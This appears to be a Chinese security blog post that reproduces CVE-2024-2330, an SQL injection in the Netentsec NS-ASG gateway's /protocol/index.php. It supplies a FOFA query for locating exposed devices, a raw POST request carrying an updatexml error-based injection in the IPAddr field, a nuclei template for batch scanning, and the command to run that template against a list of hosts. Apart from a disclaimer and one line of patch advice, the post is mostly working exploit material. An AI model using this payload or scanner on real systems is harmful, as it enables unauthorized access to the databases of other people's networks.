免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!

漏洞名称

网康NS-ASG应用安全网关index.php sql注入漏洞

漏洞影响

Netentsec NS-ASG Application Security Gateway 6.3版本

漏洞描述

网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品,集成了SSL和 IPSecQ,旨在保障业务访问的安全性,适配所有移动终端,提供多种链路均衡和选择技术,支持多种认证方式灵活组合,以及内置短信认证、LDAP令牌、USB KEY等多达13种认证方式。击者可以远程发起攻击。

FOFA搜索语句

app="网康科技-NS-ASG安全网关"

漏洞复现

向靶场发送如下数据包

POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

批量漏洞扫描poc

nuclei poc文件内容如下,计算md5(102103122)的值


id: CVE-2024-2330

info:
  name: 网康NS-ASG应用安全网关index.php sql注入漏洞
  author: fgz
  severity: critical
  description: Netentsec NS-ASG Application Security Gateway 6.3中发现了一个漏洞,被分类为危急级别。这影响了文件/protocol/index.php的一个未知部分。对参数IPAddr的操作导致了SQL注入。攻击者可以远程发起攻击。
  metadata:
    max-request: 1
    fofa-query: app="网康科技-NS-ASG安全网关"
    verified: true
requests:
  - raw:
      - |+
        POST /protocol/index.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Sec-Fetch-Dest: empty
        Sec-Fetch-Mode: cors
        Sec-Fetch-Site: same-origin
        Te: trailers
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 263
        
        jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains((body), 'error') && contains(body,'6cfe798ba8e5b85feb50164c59f4bec')"

运行POC

nuclei.exe -t mypoc/cve/CVE-2024-2330.yaml -l data/wangkang.txt

修复建议

建议您更新当前系统或软件至最新版,完成漏洞的修复。